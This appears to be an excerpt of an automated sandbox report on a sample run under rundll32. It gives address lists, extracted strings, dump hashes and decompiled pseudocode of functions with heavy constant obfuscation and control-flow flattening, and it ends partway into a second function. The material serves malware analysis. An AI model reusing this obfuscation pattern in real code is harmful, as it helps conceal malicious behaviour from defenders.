0x0035b779
0x0035b779
0x0035b779
0x0035b77e
0x0035b77e
0x0035b783
0x00000000
0x0035b783
0x0035b779
0x0035b7c4
0x0035b7bc
0x0035b7b0
0x0035b7a8
0x0035b79c
0x0035bb18
0x0035bb22
0x0035bb22
0x0035b979
0x0035b97b
0x0035babf
0x0035bad0
0x0035bad3
0x0035bad5
0x0035bad7
0x00000000
0x0035b981
0x0035b981
0x0035b987
0x0035b9e7
0x0035b9f0
0x0035b9fb
0x0035ba00
0x0035ba0e
0x0035ba44
0x0035ba4b
0x0035ba57
0x0035ba68
0x0035ba6b
0x0035ba81
0x0035ba86
0x0035ba8d
0x00000000
0x0035b989
0x0035b989
0x0035b98f
0x0035bb0e
0x0035b995
0x0035b995
0x0035b997
0x00000000
0x0035b99d
0x0035b9c8
0x0035b9cf
0x0035b9d8
0x0035b9da
0x0035b9df
0x00000000
0x0035b9df
0x0035b997
0x0035b98f
0x0035b987
0x00000000
0x0035bae9
0x0035bae9
0x0035bae9
0x00000000
0x0035baf5
0x0035b783
0x0035b77e

Strings

W[o3, xrefs: 0035B65E
1P, xrefs: 0035B05F
&:,, xrefs: 0035B77E
ve, xrefs: 0035B344
&:,, xrefs: 0035B940
&:,, xrefs: 0035BADF
/i=, xrefs: 0035B19B
Kz\Q, xrefs: 0035B581
~ , xrefs: 0035B5B2
v$(a, xrefs: 0035B1E6
_}+, xrefs: 0035AF6A
gkv, xrefs: 0035B3E3
&:,, xrefs: 0035B8F1
#, xrefs: 0035B4EE
GA, xrefs: 0035B467

Memory Dump Source

Source File: 00000009.00000002.460122857.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true

Associated: 00000009.00000002.460117697.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.460138899.0000000000363000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_340000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: &:,$&:,$&:,$&:,$/i=$GA$Kz\Q$W[o3$_}+$gkv$v$(a$ve$~ $#$1P
API String ID: 0-1587349264
Opcode ID: 0e9429aeaa95fd5d13be4c6a71dcc1ca65325456c1994d27c42edb3ef095d4a2
Instruction ID: e213b3bd30a9cb66a783762bab99725a4c996e65d280f13aeadc071e52b96b53
Opcode Fuzzy Hash: 0e9429aeaa95fd5d13be4c6a71dcc1ca65325456c1994d27c42edb3ef095d4a2
Instruction Fuzzy Hash: 705200711093809FD7B9CF61C58AB8BBBE2BBC4304F10891DE6DA96260D7B19949CF53

Uniqueness

Uniqueness Score: -1.00%

Function 00342BD9 Relevance: 18.1, Strings: 14, Instructions: 636
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E00342BD9(intOrPtr __ecx) {
				char _v32;
				signed int _v36;
				signed int _v40;
				char _v44;
				signed int _v48;
				signed int _v52;
				intOrPtr _v56;
				char* _v60;
				intOrPtr _v64;
				signed int _v68;
				intOrPtr _v72;
				signed int _v76;
				char _v80;
				intOrPtr _v84;
				char _v88;
				char _v92;
				char _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				unsigned int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				signed int _v388;
				signed int _v392;
				signed int _v396;
				void* _t716;
				void* _t717;
				void* _t718;
				intOrPtr _t730;
				intOrPtr _t732;
				void* _t733;
				signed int _t735;
				void* _t741;
				intOrPtr _t746;
				intOrPtr _t752;
				intOrPtr _t754;
				intOrPtr _t755;
				void* _t757;
				void* _t759;
				intOrPtr _t760;
				void* _t766;
				signed int _t772;
				signed int _t773;
				signed int _t774;
				signed int _t775;
				signed int _t776;
				signed int _t777;
				signed int _t778;
				signed int _t779;
				signed int _t780;
				signed int _t781;
				signed int _t782;
				void* _t783;
				intOrPtr _t792;
				void* _t807;
				void* _t812;
				void* _t842;
				intOrPtr _t848;
				void* _t864;
				intOrPtr _t866;
				signed int _t867;
				void* _t868;
				void* _t873;
				signed int* _t875;
				void* _t878;

				_t875 =  &_v396;
				_v56 = 0xa0cd19;
				_t873 = 0;
				_v84 = __ecx;
				_v52 = _v52 & 0;
				_t766 = 0x41de8e2;
				_v48 = _v48 & 0;
				_v300 = 0x1109eb;
				_v300 = _v300 + 0xcb;
				_v300 = _v300 | 0xecff95c2;
				_v300 = _v300 ^ 0xa1bddbbd;
				_v252 = 0xe28eec;
				_v252 = _v252 + 0x19d6;
				_v252 = _v252 | 0xcaf404bd;
				_v252 = _v252 ^ 0xcaf6acfe;
				_v124 = 0x517500;
				_v124 = _v124 + 0x84ec;
				_v124 = _v124 ^ 0x0051f9ec;
				_v344 = 0xbde49;
				_t772 = 0x31;
				_v344 = _v344 * 0x35;
				_v344 = _v344 << 9;
				_v344 = _v344 + 0x7afe;
				_v344 = _v344 ^ 0xea0ab4fe;
				_v232 = 0xd06c4e;
				_v232 = _v232 | 0x98bd8447;
				_v232 = _v232 + 0xffff492f;
				_v232 = _v232 ^ 0x98fd357e;
				_v236 = 0xf2a19d;
				_v236 = _v236 << 8;
				_v236 = _v236 | 0xeb063d66;
				_v236 = _v236 ^ 0xfba7bd66;
				_v304 = 0x7cba75;
				_v304 = _v304 << 0x10;
				_v304 = _v304 >> 0xd;
				_v304 = _v304 ^ 0x0005d3a8;
				_v220 = 0xced2db;
				_v220 = _v220 >> 0xb;
				_v220 = _v220 * 0x6a;
				_v220 = _v220 ^ 0x000ab444;
				_v356 = 0x98a5e4;
				_v356 = _v356 ^ 0xdd9204f6;
				_v356 = _v356 | 0x4689a95f;
				_v356 = _v356 * 0x48;
				_v356 = _v356 ^ 0xdf47a2b8;
				_v292 = 0x99ac6b;
				_v292 = _v292 * 0x35;
				_v292 = _v292 / _t772;
				_v292 = _v292 ^ 0x00a637e1;
				_v348 = 0x8d86f8;
				_v348 = _v348 + 0x9ec9;
				_v348 = _v348 + 0xfffff441;
				_v348 = _v348 * 0x3a;
				_v348 = _v348 ^ 0x2031e474;
				_v208 = 0x39dd97;
				_v208 = _v208 << 0x10;
				_v208 = _v208 + 0x9a19;
				_v208 = _v208 ^ 0xdd979a19;
				_v100 = 0xd2197;
				_v100 = _v100 + 0x97e4;
				_v100 = _v100 ^ 0x000db95b;
				_v324 = 0x771ce;
				_v324 = _v324 << 1;
				_v324 = _v324 ^ 0x580a954c;
				_v324 = _v324 ^ 0x580cba62;
				_v352 = 0xd79a55;
				_t867 = 0x4d;
				_v352 = _v352 / _t867;
				_v352 = _v352 << 5;
				_v352 = _v352 + 0xffffa0ed;
				_v352 = _v352 ^ 0x005b1fb1;
				_v264 = 0xbc6795;
				_v264 = _v264 + 0x99f5;
				_v264 = _v264 | 0xde86e00c;
				_v264 = _v264 ^ 0xdeb9ffad;
				_v240 = 0x2649df;
				_v240 = _v240 + 0x8f57;
				_v240 = _v240 + 0xffffdcf3;
				_v240 = _v240 ^ 0x002859eb;
				_v180 = 0x284ff;
				_v180 = _v180 + 0xfffffbe4;
				_v180 = _v180 ^ 0x0004b053;
				_v248 = 0x43d81c;
				_t773 = 0x2c;
				_v248 = _v248 * 0x30;
				_v248 = _v248 + 0x77f1;
				_v248 = _v248 ^ 0x0cb65cea;
				_v164 = 0x561af9;
				_v164 = _v164 * 0x5f;
				_v164 = _v164 ^ 0x1ff767f2;
				_v172 = 0x424117;
				_v172 = _v172 / _t773;
				_v172 = _v172 ^ 0x000edcdb;
				_v336 = 0xedf003;
				_v336 = _v336 + 0xffff11da;
				_v336 = _v336 >> 2;
				_v336 = _v336 >> 9;
				_v336 = _v336 ^ 0x000c05d4;
				_v216 = 0xec53cc;
				_v216 = _v216 | 0x30e2710b;
				_v216 = _v216 * 0x1f;
				_v216 = _v216 ^ 0xeced0588;
				_v224 = 0xc36dcc;
				_v224 = _v224 * 0x64;
				_v224 = _v224 * 0xc;
				_v224 = _v224 ^ 0x9413d5fd;
				_v148 = 0x5fde01;
				_v148 = _v148 ^ 0x51967584;
				_v148 = _v148 ^ 0x51c7dbee;
				_v156 = 0x26546c;
				_v156 = _v156 ^ 0x8ec08bcd;
				_v156 = _v156 ^ 0x8eeee361;
				_v396 = 0x210674;
				_v396 = _v396 ^ 0xb585172f;
				_v396 = _v396 >> 9;
				_v396 = _v396 ^ 0x5fa8c9ed;
				_v396 = _v396 ^ 0x5ff25ba7;
				_v112 = 0xa4fdb5;
				_v112 = _v112 ^ 0x7ac22777;
				_v112 = _v112 ^ 0x7a606cfd;
				_v160 = 0x7fe066;
				_v160 = _v160 | 0xe6d7910f;
				_v160 = _v160 ^ 0xe6fe40a3;
				_v152 = 0xb045a1;
				_v152 = _v152 ^ 0x0733bf74;
				_v152 = _v152 ^ 0x078d93a6;
				_v384 = 0x7bd524;
				_v384 = _v384 + 0xffff236c;
				_v384 = _v384 * 0x7b;
				_v384 = _v384 + 0xffffb98b;
				_v384 = _v384 ^ 0x3b1735e1;
				_v392 = 0x61d9a1;
				_v392 = _v392 + 0xab93;
				_v392 = _v392 + 0xffff054c;
				_v392 = _v392 | 0xc62dc39c;
				_v392 = _v392 ^ 0xc661791a;
				_v376 = 0x1528d1;
				_v376 = _v376 << 8;
				_v376 = _v376 + 0xffff31a1;
				_v376 = _v376 >> 9;
				_v376 = _v376 ^ 0x000f3b72;
				_v268 = 0x199e3d;
				_v268 = _v268 ^ 0x3c18ecc0;
				_v268 = _v268 >> 0xf;
				_v268 = _v268 ^ 0x00085298;
				_v116 = 0x9d324d;
				_t774 = 0x5b;
				_v116 = _v116 * 0x35;
				_v116 = _v116 ^ 0x2088a224;
				_v144 = 0xea008e;
				_v144 = _v144 * 0x31;
				_v144 = _v144 ^ 0x2cc3d943;
				_v200 = 0xbe23d7;
				_v200 = _v200 / _t774;
				_v200 = _v200 ^ 0x0006a720;
				_v368 = 0xbc3a01;
				_v368 = _v368 >> 2;
				_v368 = _v368 << 1;
				_v368 = _v368 | 0x91e27348;
				_v368 = _v368 ^ 0x91f48308;
				_v312 = 0x81ba05;
				_v312 = _v312 ^ 0x6d6d273d;
				_v312 = _v312 + 0x9af1;
				_v312 = _v312 ^ 0x6ded9aad;
				_v320 = 0xa9a2ca;
				_v320 = _v320 / _t867;
				_t775 = 0x39;
				_v320 = _v320 / _t775;
				_v320 = _v320 ^ 0x0005ef3e;
				_v136 = 0x8e55db;
				_t776 = 0xb;
				_v136 = _v136 / _t776;
				_v136 = _v136 ^ 0x00010f6d;
				_v296 = 0x9a02a3;
				_v296 = _v296 | 0xc0bbeea6;
				_v296 = _v296 ^ 0xfebfff47;
				_v296 = _v296 ^ 0x3e0de8e7;
				_v196 = 0x628794;
				_v196 = _v196 >> 7;
				_v196 = _v196 ^ 0x00033c53;
				_v360 = 0xc75687;
				_t777 = 0x55;
				_v360 = _v360 / _t777;
				_t778 = 0x4a;
				_v360 = _v360 / _t778;
				_t779 = 0x66;
				_v360 = _v360 / _t779;
				_v360 = _v360 ^ 0x0006bc1c;
				_v288 = 0xb89ddb;
				_t780 = 0x5c;
				_v288 = _v288 * 0x7b;
				_v288 = _v288 + 0x220a;
				_v288 = _v288 ^ 0x58b2320e;
				_v108 = 0x352a49;
				_v108 = _v108 | 0x42677ea4;
				_v108 = _v108 ^ 0x427d3f06;
				_v332 = 0x1123f9;
				_v332 = _v332 + 0xfffffbdd;
				_v332 = _v332 + 0xffff8b7f;
				_v332 = _v332 | 0xcf6269e1;
				_v332 = _v332 ^ 0xcf7a63e7;
				_v192 = 0x15ba5c;
				_v192 = _v192 + 0xffff7d63;
				_v192 = _v192 ^ 0x0011de47;
				_v204 = 0xd88287;
				_v204 = _v204 >> 1;
				_v204 = _v204 ^ 0x006fcfd9;
				_v308 = 0x394063;
				_v308 = _v308 | 0x23438f89;
				_v308 = _v308 ^ 0x95557e79;
				_v308 = _v308 ^ 0xb625da34;
				_v260 = 0x6632ca;
				_v260 = _v260 << 0xc;
				_v260 = _v260 / _t780;
				_v260 = _v260 ^ 0x011a1b64;
				_v316 = 0x1ead1d;
				_v316 = _v316 >> 0xf;
				_v316 = _v316 << 0xe;
				_v316 = _v316 ^ 0x000acc6a;
				_v388 = 0xc01c7d;
				_v388 = _v388 >> 9;
				_v388 = _v388 | 0xa159bc3f;
				_v388 = _v388 ^ 0x1058b9c4;
				_v388 = _v388 ^ 0xb10bd724;
				_v256 = 0x2459a9;
				_v256 = _v256 + 0xffff58c0;
				_v256 = _v256 >> 0xc;
				_v256 = _v256 ^ 0x000386a3;
				_v340 = 0xa38d0b;
				_t781 = 0x78;
				_v340 = _v340 / _t781;
				_v340 = _v340 ^ 0x3e3bd45c;
				_v340 = _v340 + 0xf3c0;
				_v340 = _v340 ^ 0x3e3a819a;
				_v380 = 0x2dd945;
				_v380 = _v380 << 4;
				_v380 = _v380 + 0xffffb7c2;
				_v380 = _v380 << 6;
				_v380 = _v380 ^ 0xb75574a7;
				_v272 = 0xf6939e;
				_v272 = _v272 | 0x851c2f86;
				_v272 = _v272 + 0xffff0412;
				_v272 = _v272 ^ 0x85fd1a3b;
				_v188 = 0x2c17e;
				_v188 = _v188 >> 3;
				_v188 = _v188 ^ 0x000c5ae0;
				_v280 = 0xf08b81;
				_v280 = _v280 | 0x75266007;
				_v280 = _v280 ^ 0xc75f894a;
				_v280 = _v280 ^ 0xb2a4e63e;
				_v372 = 0x6f48a0;
				_v372 = _v372 << 0xa;
				_v372 = _v372 >> 0x10;
				_v372 = _v372 | 0x5e122b7b;
				_v372 = _v372 ^ 0x5e16ce05;
				_v184 = 0x747075;
				_v184 = _v184 + 0xcea0;
				_v184 = _v184 ^ 0x007a5d3b;
				_v128 = 0x4ebeca;
				_v128 = _v128 + 0xffffee54;
				_v128 = _v128 ^ 0x004a846f;
				_v120 = 0xe78fe5;
				_t868 = 0x80c65ec;
				_v120 = _v120 + 0xffff4f7b;
				_t864 = 0xf9e92c1;
				_v120 = _v120 ^ 0x00e2ece2;
				_v276 = 0xe2917e;
				_v276 = _v276 << 6;
				_v276 = _v276 + 0xffff0dfb;
				_v276 = _v276 ^ 0x38a72339;
				_v176 = 0x1ec236;
				_v176 = _v176 ^ 0x7af5486d;
				_v176 = _v176 ^ 0x7aeb8f45;
				_v244 = 0x4d92e1;
				_t782 = 0x5f;
				_v88 = 0x20;
				_v244 = _v244 * 0x4a;
				_v244 = _v244 | 0x7c3f7c28;
				_v244 = _v244 ^ 0x7e7c1ac2;
				_v284 = 0xc8aa60;
				_v284 = _v284 + 0x32b9;
				_v284 = _v284 + 0xffff127a;
				_v284 = _v284 ^ 0x00c1b775;
				_v228 = 0x32f957;
				_v228 = _v228 << 0xa;
				_v228 = _v228 ^ 0xe304a089;
				_v228 = _v228 ^ 0x28edcf32;
				_v364 = 0x1a55e7;
				_v364 = _v364 * 0x68;
				_v364 = _v364 * 0x36;
				_v364 = _v364 ^ 0xa842ca33;
				_v364 = _v364 ^ 0xe9f59c27;
				_v168 = 0x34b570;
				_v168 = _v168 | 0x6b6928c5;
				_v168 = _v168 ^ 0x6b739674;
				_v104 = 0x8a8082;
				_v104 = _v104 * 0x3f;
				_v104 = _v104 ^ 0x2214377a;
				_v212 = 0x18307b;
				_v212 = _v212 ^ 0x4b6e1055;
				_v212 = _v212 ^ 0x41119872;
				_v212 = _v212 ^ 0x0a6c434c;
				_v132 = 0x8b3f3c;
				_v132 = _v132 << 2;
				_v132 = _v132 ^ 0x022c35f2;
				_v328 = 0x314aa5;
				_v328 = _v328 | 0xbabb419f;
				_v328 = _v328 / _t782;
				_v328 = _v328 + 0xe73f;
				_v328 = _v328 ^ 0x01f1132e;
				_v140 = 0x403514;
				_v140 = _v140 + 0xffff4e06;
				_v140 = _v140 ^ 0x0039264a;
				while(1) {
					L1:
					_t783 = 0xf0ee26a;
					_t842 = 0xbf4f028;
					_t716 = 0xc1f5c56;
					do {
						while(1) {
							L2:
							_t878 = _t766 - _t716;
							if(_t878 > 0) {
								break;
							}
							if(_t878 == 0) {
								_push(_v160);
								_push(_v112);
								_t732 = E0035DCF7(_v396, 0x341884, __eflags);
								_push(_v392);
								_t866 = _t732;
								_push(_v384);
								_t733 = E0035DCF7(_v152, 0x341924, __eflags);
								_v76 = _v124;
								_t735 = E0034CB52(_v376, _t866, _v268, _v116, _v144);
								_v68 = _v68 & 0x00000000;
								_v72 = _t866;
								_v80 = 2 + _t735 * 2;
								_v60 =  &_v80;
								_v92 = _v88;
								_v64 = 1;
								_t741 = E00348D13( &_v32, _v200, _v368,  &_v92, _v84, _t733, _v312,  &_v68, _v88, _v320, _v136, _v236);
								_t875 =  &(_t875[0x11]);
								__eflags = _t741 - _v304;
								_t766 =  ==  ? 0xbf4f028 : 0xf9e92c1;
								E0034A8B0(_v296, _t866, _v196);
								E0034A8B0(_v360, _t733, _v288);
								_t864 = 0xf9e92c1;
								goto L24;
							} else {
								if(_t766 == 0xdec32e) {
									_t746 =  *0x363dfc; // 0x0
									E00358519(_v104, _v212,  *((intOrPtr*)(_t746 + 0x50)));
									_t766 = _t864;
									while(1) {
										L1:
										_t783 = 0xf0ee26a;
										_t842 = 0xbf4f028;
										_t716 = 0xc1f5c56;
										goto L2;
									}
								} else {
									if(_t766 == 0x41de8e2) {
										_t766 = 0xe078043;
										continue;
									} else {
										if(_t766 == _t868) {
											_push(_v128);
											_push(_v184);
											_t871 = E0035DCF7(_v372, 0x341904, __eflags);
											_t585 =  &_v300; // 0x3e0de8e7
											_v44 =  *_t585;
											_v40 = _v252;
											_pop(_t807);
											_v36 = _v100;
											_t752 =  *0x363dfc; // 0x0
											_t754 =  *0x363dfc; // 0x0
											_t755 =  *0x363dfc; // 0x0
											_t757 = E0035D84C(_t807, _v120, _t755 + 0x64, _v276,  *((intOrPtr*)(_t754 + 0x54)), _v96, _v176, _v244, _v284, _v228, _v292, _t807, _t748,  &_v44,  *((intOrPtr*)(_t752 + 0x50)));
											_t875 =  &(_t875[0xd]);
											__eflags = _t757 - _v348;
											if(_t757 != _v348) {
												_t766 = 0xdec32e;
											} else {
												_t766 = _t864;
												_t873 = 1;
											}
											E0034A8B0(_v364, _t871, _v168);
											goto L24;
										} else {
											_t882 = _t766 - _t842;
											if(_t766 == _t842) {
												_push(_v192);
												_push(_v332);
												_t759 = E0035DCF7(_v108, 0x3418b4, _t882);
												_pop(_t812);
												_t760 =  *0x363dfc; // 0x0
												E00360B68(_t759,  &_v92, _v220, _v204, _t812, _t760 + 0x54, _v308, _v260, _v316, _v388, _v96, _v256);
												_t766 =  ==  ? 0xf0ee26a : _t864;
												E0034A8B0(_v340, _t759, _v380);
												L23:
												_t875 =  &(_t875[0xb]);
												L24:
												_t842 = 0xbf4f028;
												_t783 = 0xf0ee26a;
												_t868 = 0x80c65ec;
												_t716 = 0xc1f5c56;
											}
										}
										goto L25;
									}
								}
							}
							L20:
							return _t873;
						}
						__eflags = _t766 - 0xe078043;
						if(__eflags == 0) {
							_push(_v264);
							_push(_v352);
							_t717 = E0035DCF7(_v324, 0x3418e4, __eflags);
							_push(_v248);
							_push(_v180);
							_t718 = E0035DCF7(_v240, 0x341814, __eflags);
							_t665 =  &_v172; // 0x39264a
							__eflags = E00349462(_t717,  *_t665,  &_v96, _t718, _v336, _v344) - _v232;
							_t766 =  ==  ? 0xc1f5c56 : 0x1d0239b;
							E0034A8B0(_v216, _t717, _v224);
							E0034A8B0(_v148, _t718, _v156);
							_t864 = 0xf9e92c1;
							goto L23;
						} else {
							__eflags = _t766 - _t783;
							if(_t766 == _t783) {
								_t848 =  *0x363dfc; // 0x0
								_push(_t783);
								_push(_t783);
								_t792 = E00347FF2( *((intOrPtr*)(_t848 + 0x54)));
								_t730 =  *0x363dfc; // 0x0
								__eflags = _t792;
								_t766 =  !=  ? _t868 : _t864;
								 *((intOrPtr*)(_t730 + 0x50)) = _t792;
								goto L1;
							} else {
								__eflags = _t766 - _t864;
								if(__eflags != 0) {
									goto L25;
								} else {
									_t646 =  &_v140; // 0x39264a
									E0034957D(_v96, _v132, _v328, _v208,  *_t646);
								}
							}
						}
						goto L20;
						L25:
					} while (_t766 != 0x1d0239b);
					goto L20;
				}
			}

0x00342bd9
0x00342bdf
0x00342bee
0x00342bf0
0x00342bf7
0x00342bfe
0x00342c03
0x00342c0a
0x00342c12
0x00342c1a
0x00342c22
0x00342c2a
0x00342c35
0x00342c40
0x00342c4b
0x00342c56
0x00342c61
0x00342c6c
0x00342c77
0x00342c88
0x00342c89
0x00342c8d
0x00342c92
0x00342c9a
0x00342ca2
0x00342cad
0x00342cb8
0x00342cc3
0x00342cce
0x00342cd9
0x00342ce1
0x00342cec
0x00342cf7
0x00342cff
0x00342d04
0x00342d09
0x00342d11
0x00342d1c
0x00342d2e
0x00342d35
0x00342d40
0x00342d48
0x00342d50
0x00342d5d
0x00342d61
0x00342d69
0x00342d76
0x00342d80
0x00342d84
0x00342d8c
0x00342d94
0x00342d9c
0x00342da9
0x00342dad
0x00342db5
0x00342dc0
0x00342dc8
0x00342dd3
0x00342dde
0x00342de9
0x00342df4
0x00342dff
0x00342e07
0x00342e0b
0x00342e13
0x00342e1d
0x00342e29
0x00342e2e
0x00342e34
0x00342e39
0x00342e41
0x00342e49
0x00342e54
0x00342e5f
0x00342e6a
0x00342e75
0x00342e80
0x00342e8b
0x00342e96
0x00342ea1
0x00342eac
0x00342eb7
0x00342ec2
0x00342ed5
0x00342ed6
0x00342edd
0x00342ee8
0x00342ef3
0x00342f06
0x00342f0d
0x00342f18
0x00342f2c
0x00342f33
0x00342f3e
0x00342f46
0x00342f4e
0x00342f53
0x00342f58
0x00342f60
0x00342f6b
0x00342f7e
0x00342f85
0x00342f90
0x00342fa3
0x00342fb2
0x00342fb9
0x00342fc4
0x00342fcf
0x00342fda
0x00342fe5
0x00342ff0
0x00342ffb
0x00343006
0x0034300e
0x00343016
0x0034301b
0x00343023
0x0034302b
0x00343036
0x00343041
0x0034304c
0x00343057
0x00343062
0x0034306d
0x00343078
0x00343083
0x0034308e
0x00343096
0x003430a3
0x003430a7
0x003430af
0x003430b7
0x003430bf
0x003430c7
0x003430cf
0x003430d7
0x003430df
0x003430e9
0x003430ee
0x003430f6
0x003430fb
0x00343103
0x0034310e
0x00343119
0x00343121
0x0034312c
0x00343141
0x00343144
0x0034314b
0x00343156
0x00343169
0x00343170
0x0034317b
0x00343191
0x00343198
0x003431a3
0x003431ab
0x003431b0
0x003431b4
0x003431bc
0x003431c4
0x003431cc
0x003431d4
0x003431dc
0x003431e4
0x003431f4
0x003431fc
0x00343201
0x00343207
0x0034320f
0x00343221
0x00343226
0x0034322f
0x0034323a
0x00343242
0x0034324a
0x00343252
0x0034325a
0x00343265
0x0034326d
0x00343278
0x00343284
0x00343289
0x00343293
0x00343298
0x003432a2
0x003432a5
0x003432a9
0x003432b1
0x003432c2
0x003432c5
0x003432cc
0x003432d7
0x003432e2
0x003432ed
0x003432f8
0x00343303
0x0034330b
0x00343313
0x0034331b
0x00343323
0x0034332b
0x00343336
0x00343341
0x0034334c
0x00343357
0x0034335e
0x00343369
0x00343371
0x00343379
0x00343381
0x00343389
0x00343394
0x003433a7
0x003433ae
0x003433b9
0x003433c1
0x003433c6
0x003433cb
0x003433d3
0x003433db
0x003433e0
0x003433e8
0x003433f0
0x003433f8
0x00343403
0x0034340e
0x00343416
0x00343421
0x0034342d
0x00343430
0x00343434
0x0034343c
0x00343444
0x0034344c
0x00343454
0x00343459
0x00343461
0x00343466
0x0034346e
0x00343479
0x00343484
0x0034348f
0x0034349a
0x003434a5
0x003434ad
0x003434b8
0x003434c3
0x003434ce
0x003434d9
0x003434e4
0x003434ec
0x003434f1
0x003434f6
0x003434fe
0x00343506
0x00343511
0x0034351c
0x00343527
0x00343532
0x0034353d
0x0034354a
0x00343555
0x0034355a
0x00343565
0x0034356a
0x00343575
0x00343580
0x00343588
0x00343593
0x0034359e
0x003435a9
0x003435b4
0x003435bf
0x003435d4
0x003435d5
0x003435e0
0x003435e7
0x003435f2
0x003435fd
0x00343608
0x00343613
0x0034361e
0x00343629
0x00343634
0x0034363c
0x00343647
0x00343652
0x0034365f
0x00343668
0x0034366c
0x00343674
0x0034367c
0x00343687
0x00343692
0x0034369d
0x003436b0
0x003436b7
0x003436c2
0x003436cd
0x003436d8
0x003436e3
0x003436ee
0x003436f9
0x00343701
0x0034370c
0x00343714
0x00343722
0x00343726
0x0034372e
0x00343736
0x00343741
0x0034374c
0x00343757
0x00343757
0x00343757
0x0034375c
0x00343761
0x00343766
0x00343766
0x00343766
0x00343766
0x00343768
0x00000000
0x00000000
0x0034376e
0x0034392a
0x00343936
0x00343941
0x00343946
0x0034394f
0x00343951
0x0034395c
0x00343973
0x0034398c
0x00343998
0x003439b5
0x003439c3
0x003439d1
0x003439e0
0x003439fd
0x00343a1c
0x00343a23
0x00343a2f
0x00343a43
0x00343a46
0x00343a58
0x00343a5f
0x00000000
0x00343774
0x0034377a
0x00343907
0x0034391d
0x00343923
0x00343757
0x00343757
0x00343757
0x0034375c
0x00343761
0x00000000
0x00343761
0x00343780
0x00343786
0x003438fd
0x00000000
0x0034378c
0x0034378e
0x00343829
0x00343835
0x00343845
0x00343847
0x0034384b
0x0034385a
0x00343868
0x00343869
0x00343870
0x003438a5
0x003438bb
0x003438cb
0x003438d0
0x003438d3
0x003438d7
0x003438e0
0x003438d9
0x003438db
0x003438dd
0x003438dd
0x003438f2
0x00000000
0x00343794
0x00343794
0x00343796
0x0034379c
0x003437a8
0x003437b3
0x003437b9
0x003437e4
0x003437fe
0x0034381c
0x0034381f
0x00343b98
0x00343b98
0x00343b9b
0x00343b9b
0x00343ba0
0x00343ba5
0x00343baa
0x00343baa
0x00343796
0x00000000
0x0034378e
0x00343786
0x0034377a
0x00343aa7
0x00343ab1
0x00343ab1
0x00343a69
0x00343a6f
0x00343aef
0x00343afb
0x00343b03
0x00343b08
0x00343b16
0x00343b24
0x00343b3e
0x00343b68
0x00343b76
0x00343b79
0x00343b8e
0x00343b93
0x00000000
0x00343a71
0x00343a71
0x00343a73
0x00343ac7
0x00343acd
0x00343ace
0x00343ad9
0x00343add
0x00343ae2
0x00343ae4
0x00343ae7
0x00000000
0x00343a75
0x00343a75
0x00343a77
0x00000000
0x00343a7d
0x00343a7d
0x00343a9d
0x00343aa2
0x00343a77
0x00343a73
0x00000000
0x00343baf
0x00343baf
0x00000000
0x00343bbb

Strings

='mm, xrefs: 003431CC
J&9, xrefs: 00343A7D
", xrefs: 003432CC
J&9, xrefs: 00343161
Y(, xrefs: 00342E96
?, xrefs: 00343726
;]z, xrefs: 0034351C
(|?|, xrefs: 003435E7
c@9, xrefs: 00343369
>, xrefs: 00343847
t1 , xrefs: 00342DAD
lT&, xrefs: 00342FE5
, xrefs: 003435D5
LCl, xrefs: 003436E3

Memory Dump Source

Source File: 00000009.00000002.460122857.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true

Associated: 00000009.00000002.460117697.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.460138899.0000000000363000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_340000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: "$ $(|?|$;]z$='mm$?$J&9$J&9$LCl$c@9$lT&$t1 $Y($>
API String ID: 0-2382046788
Opcode ID: 972c9422a4b6c11cae892697d071a3d959bf25c59b963ae864295d794536b3c8
Instruction ID: 6c17cf5d66afae6dadba01cf067145c7d4832951dea1ef11488b6f98ce1e28d2
Opcode Fuzzy Hash: 972c9422a4b6c11cae892697d071a3d959bf25c59b963ae864295d794536b3c8
Instruction Fuzzy Hash: 6372FE715093818FD3B9CF25C58AB8BBBE1FBC5304F10891DE5DA8A260DBB59949CF42

Uniqueness

Uniqueness Score: -1.00%

Function 00355CC4 Relevance: 16.7, Strings: 13, Instructions: 434
COMMONCrypto

Download Yara Rule

C-Code - Quality: 88%

			E00355CC4() {
				char _v520;
				char _v1040;
				char _v1560;
				void* _v1572;
				intOrPtr _v1576;
				signed int _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
